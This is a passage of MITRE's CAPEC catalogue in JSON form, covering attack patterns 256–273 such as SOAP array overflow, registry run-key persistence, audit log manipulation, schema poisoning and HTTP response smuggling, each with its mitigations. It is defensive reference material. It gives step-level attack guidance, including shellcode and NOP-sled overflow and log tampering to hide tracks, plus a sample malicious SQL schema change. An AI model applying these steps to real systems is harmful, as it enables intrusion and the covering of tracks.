Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"256":{"ID":"256","Name":"SOAP Array Overflow","Abstraction":"Detailed","Status":"Draft","Description":"An attacker sends a SOAP request with an array whose actual length exceeds the length indicated in the request. If the server processing the transmission naively trusts the specified size, then an attacker can intentionally understate the size of the array, possibly resulting in a buffer overflow if the server attempts to read the entire data set into the memory it allocated for a smaller array.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application to perform the buffer overflow on. In this attack, adversaries look for applications that utilize SOAP as a communication mechanism."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer.","Technique":"The adversary creates a SOAP message that incorrectly specifies the size of its array to be smaller than the size of the actual content by a large margin and sends it to the application. If this causes a crash or some unintended behavior, it is likely that this is a valid injection vector."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs","The adversary will choose a SOAP type that allows them to put shellcode into the buffer when the array is read into the application."]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary sends the crafted SOAP message to the program, overflowing the buffer."}]},"Prerequisites":{"Prerequisite":"The targeted SOAP server must trust that the array size as stated in messages it receives is correct, but read through the entire content of the message regardless of the stated size of the array."},"Resources_Required":{"Resource":"The attacker must be able to craft malformed SOAP messages, specifically, messages with arrays where the stated array size understates the actual size of the array in the message."},"Mitigations":{"Mitigation":"If the server either verifies the correctness of the stated array size or if the server stops processing an array once the stated number of elements have been read, regardless of the actual array size, then this attack will fail. The former detects the malformed SOAP message while the latter ensures that the server does not attempt to load more data than was allocated for."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"805"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"35","Entry_Name":"SOAP Array Abuse"}},"References":{"Reference":[{"External_Reference_ID":"REF-102"},{"External_Reference_ID":"REF-103","Section":"5.4.2 Arrays"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"261":{"ID":"261","Name":"Fuzzing for garnering other adjacent user/sensitive data","Abstraction":"Detailed","Status":"Draft","Description":"An adversary who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide. Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. If the server does not verify that the query matches one of the expected templates, an adversary who is allowed to send normal queries could modify their query to try to return additional information. The adversary may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that either provide user/sensitive data or give information about an expected template that could be used to produce this data."},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] If the logs did not reveal any user/sensitive data, an adversary will attempt to make the fuzzing inputs form to an expected template","Technique":["Create variants of expected templates that request additional information","Create variants that exclude limiting clauses","Create variants that alter fields taht identify the requester in order to subvert access controls","Repeat different fuzzing variants until sensitive information is divulged"]}]},"Prerequisites":{"Prerequisite":"The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates."},"Resources_Required":{"Resource":"The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries."},"Example_Instances":{"Example":{"p":"A client that queries an employee database might have templates such that the user only supplies the target\'s name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. For this example, additional information might include social security numbers or salaries."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"263":{"ID":"263","Name":"Force Use of Corrupted Files","Abstraction":"Detailed","Status":"Draft","Description":"This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":["The targeted application must utilize a configuration file that an attacker is able to corrupt. In some cases, the attacker must be able to force the (re-)reading of the corrupted file if the file is normally only consulted at startup.","The severity of the attack hinges on how the application responds to the corrupted file. If the application detects the corruption and locks down, this may result in the denial of services provided by the application. If the application fails to detect the corruption, the result could be a more severe denial of service (crash or hang) or even an exploitable buffer overflow. If the application detects the corruption but fails in an unsafe way, this attack could result in the continuation of services but without certain security structures, such as filters or access controls. For example, if the corrupted file configures filters, an unsafe response from an application could result in simply disabling the filtering mechanisms due to the lack of usable configuration data."]},"Resources_Required":{"Resource":"This varies depending on the resources necessary to corrupt the configuration file and the resources needed to force the application to re-read it (if any)."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"267":{"ID":"267","Name":"Leverage Alternate Encoding","Abstraction":"Standard","Status":"Draft","Description":"An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"153"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery.","Manually inspect the application to find entry points."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various payloads using a variety of different types of encodings to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.","Technique":"Try to use different encodings of content in order to bypass validation routines."}]},"Prerequisites":{"Prerequisite":"The application\'s decoder accepts and interprets encoded characters. Data canonicalization, input filtering and validating is not done properly leaving the door open to harmful characters for the target host."},"Skills_Required":{"Skill":["An attacker can inject different representation of a filtered character in a different encoding.",{"Level":"Low"},"An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Assume all input might use an improper representation. Use canonicalized data inside the application; all data must be converted into the representation used inside the application (UTF-8, UTF-16, etc.)","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input."]},"Example_Instances":{"Example":["Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified \\"encoding strings,\\" which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka \\"Post Encoding Information Disclosure Vulnerability.\\" Related Vulnerabilities CVE-2010-0488","Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"73"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"References":{"Reference":[{"External_Reference_ID":"REF-108","Section":"WASC-20 - Improper Input Handling"},{"External_Reference_ID":"REF-109","Section":"Category: Encoding"},{"External_Reference_ID":"REF-110","Section":"Canonicalization, locale and Unicode"},{"External_Reference_ID":"REF-69","Section":"XSS (Cross Site Scripting) Prevention Cheat Sheet"},{"External_Reference_ID":"REF-112","Section":"Chapter 5 Section 9: Character Encoding"},{"External_Reference_ID":"REF-113","Section":"Character encoding"},{"External_Reference_ID":"REF-114"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"268":{"ID":"268","Name":"Audit Log Manipulation","Abstraction":"Standard","Status":"Draft","Description":"The attacker injects, manipulates, deletes, or forges malicious log entries into the log file, in an attempt to mislead an audit of the log file or cover tracks of an attack. Due to either insufficient access controls of the log files or the logging mechanism, the attacker is able to perform such actions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The target host is logging the action and data of the user.","The target host insufficiently protects access to the logs or logging mechanisms."]},"Resources_Required":{"Resource":{"p":["The attacker must understand how the logging mechanism works.","Optionally, the attacker must know the location and the format of individual entries of the log files."]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"117"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Log Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"270":{"ID":"270","Name":"Modification of Registry Run Keys","Abstraction":"Detailed","Status":"Stable","Description":"An adversary adds a new entry to the \\"run keys\\" in the Windows registry so that an application of their choosing is executed when a user logs in. In this way, the adversary can get their executable to operate and run on the target system with the authorized user\'s level of permissions. This attack is a good way for an adversary to run persistent spyware on a user\'s machine, such as a keylogger.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"203"},{"Nature":"CanPrecede","CAPEC_ID":"568"},{"Nature":"CanPrecede","CAPEC_ID":"529"},{"Nature":"CanPrecede","CAPEC_ID":"646"},{"Nature":"CanFollow","CAPEC_ID":"555"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target system] The adversary must first determine the system they wish to target. This attack only works on Windows."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to the system] The adversary needs to gain access to the system in some way so that they can modify the Windows registry.","Technique":["Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.","Gain remote access to a system through a variety of means."]},{"Step":"3","Phase":"Exploit","Description":"[Modify Windows registry] The adversary will modify the Windows registry by adding a new entry to the \\"run keys\\" referencing a desired program. This program will be run whenever the user logs in."}]},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Modify Data","Gain Privileges"]}},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Example_Instances":{"Example":["An adversary can place a malicious executable (RAT) on the target system and then configure it to automatically run when the user logs in to maintain persistence on the target system.","Through the modification of registry \\"run keys\\" the adversary can masquerade a malicious executable as a legitimate program."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"15"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.001","Entry_Name":"Boot or Logon Autostart Execution:Registry Run Keys \u2013 Start Folder"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"}]}},"271":{"ID":"271","Name":"Schema Poisoning","Abstraction":"Standard","Status":"Draft","Description":"An adversary corrupts or modifies the content of a schema for the purpose of undermining the security of the target. Schemas provide the structure and content definitions for resources used by an application. By replacing or modifying a schema, the adversary can affect how the application handles or interprets a resource, often leading to possible denial of service, entering into an unexpected state, or recording incomplete data.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanFollow","CAPEC_ID":"94"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target application and schema] The adversary first finds the application that they want to target. This application must use schemas in some way, so the adversary also needs to confirm that schemas are being used.","Technique":["Gain access to the system that the application is on and look for a schema.","Observe HTTP traffic to the application and look for a schema being transmitted."]},{"Step":"2","Phase":"Experiment","Description":"[Gain access to schema] The adversary gains access to the schema so that they can modify the contents.","Technique":["For a local scenario, the adversary needs access to the machine that the schema is located on and gain permissions to alter the contents of the schema file.","For a remote scenario, the adversary needs to be able to perform an adversary in the middle attack on the HTTP traffic that contains a schema."]},{"Step":"3","Phase":"Exploit","Description":"[Poison schema] Once the adversary gains access to the schema, they will alter it to achieve a desired effect. Locally, they can just modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.","Technique":["Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing.","Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.","Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B)."]}]},"Prerequisites":{"Prerequisite":["Some level of access to modify the target schema.","The schema used by the target application must be improperly secured against unauthorized modification and manipulation."]},"Resources_Required":{"Resource":"Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful schema poisoning attack can compromise the availability of the target system\'s service by exhausting its available resources."},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Protect the schema against unauthorized modification.","Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the schema document.","Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification."]},"Example_Instances":{"Example":[{"p":["In a JSON Schema Poisoning Attack, an adervary modifies the JSON schema to cause a Denial of Service (DOS) or to submit malicious input:","If the \'name\' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur."],"div":["{ \\"title\\": \\"Contact\\", \\"type\\": \\"object\\", \\"properties\\": { \\"Name\\": { \\"type\\": \\"string\\" }, \\"Phone\\": { \\"type\\": \\"string\\" }, \\"Email\\": { \\"type\\": \\"string\\" }, \\"Address\\": { \\"type\\": \\"string\\" } }, \\"required\\": [\\"Name\\", \\"Phone\\", \\"Email\\", \\"Address\\"] }",{"style":"margin-left:10px;","class":"attack"}]},{"p":["In a Database Schema Poisoning Attack, an adversary alters the database schema being used to modify the database in some way. This can result in loss of data, DOS, or malicious input being submitted. Assuming there is a column named \\"name\\", an adversary could make the following schema change:","The \\"Name\\" field of the \\"Conteacts\\" table now allows the storing of names up to 65353 characters in length. This could allow the adversary to store excess data within the database to consume system resource or to execute a DOS."],"div":["ALTER TABLE Contacts MODIFY Name VARCHAR(65353);",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"15"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"}]}},"272":{"ID":"272","Name":"Protocol Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The protocol or implementations thereof must contain bugs that an adversary can exploit."},"Resources_Required":{"Resource":"In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"273":{"ID":"273","Name":"HTTP Response Smuggling","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary manipulates and injects malicious content in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., server).","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["In the maliciously manipulated HTTP response, an adversary can add duplicate header fields that HTTP agents interpret as belonging to separate responses.","The combined HTTP response ends up being parsed or interpreted as two or more HTTP responses by the targeted client HTTP agent. This allows malicious HTTP responses to bypass security controls. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.","This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.","This differs from CAPEC-33 HTTP Request Smuggling, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Smuggling is an attempt to compromise a",{"em":"client agent (e.g., web browser)"},"HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest."]},"Alternate_Terms":{"Alternate_Term":{"Term":"HTTP Desync","Description":"Modification/manipulation of HTTP message headers and body parameters to disrupt and interfere in the interpretation and parsing of HTTP message lengths/boundaries for consecutive HTTP messages by HTTP agents in a HTTP chain or network path."}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"33"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure to intended targets in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Response vulnerabilities] The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP response. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses will be observed to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Inject additional HTTP headers to utilize various combinations of HTTP Headers within a single HTTP message such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded message or data in the body of the original message are unprocessed and treated as part of subsequent messages by the intended target HTTP agent.","From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences."],"ul":{"li":["For CL;TE and TE;CL HTTP headers combination, the first HTTP agent, in the HTTP message path that receives the HTTP message, takes precedence or only processes the one header but not the other, while the second/final HTTP agent processes the opposite header allowing for embedded HTTP message to be ignored and smuggled to the intended target HTTP agent.","For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP messages to be smuggled. See Mitigations for details."]}},{"p":["Construct a very large HTTP message via multiple Content-Length headers of various data lengths that can potentially cause subsequent messages to be ignored by an intermediary HTTP agent (e.g., firewall) and/or eventually parsed separately by the target HTTP agent.","Note that most modern HTTP infrastructure reject HTTP messages with multiple Content-Length headers."]},"Monitor HTTP traffic using a tool such as a Network Protocol Analyzer."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Response Smuggling attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server\'s response to target HTTP agents (e.g., proxies and users\' web browsers).","Differences in the way the two HTTP agents parse and interpret HTTP responses and its headers.","HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual 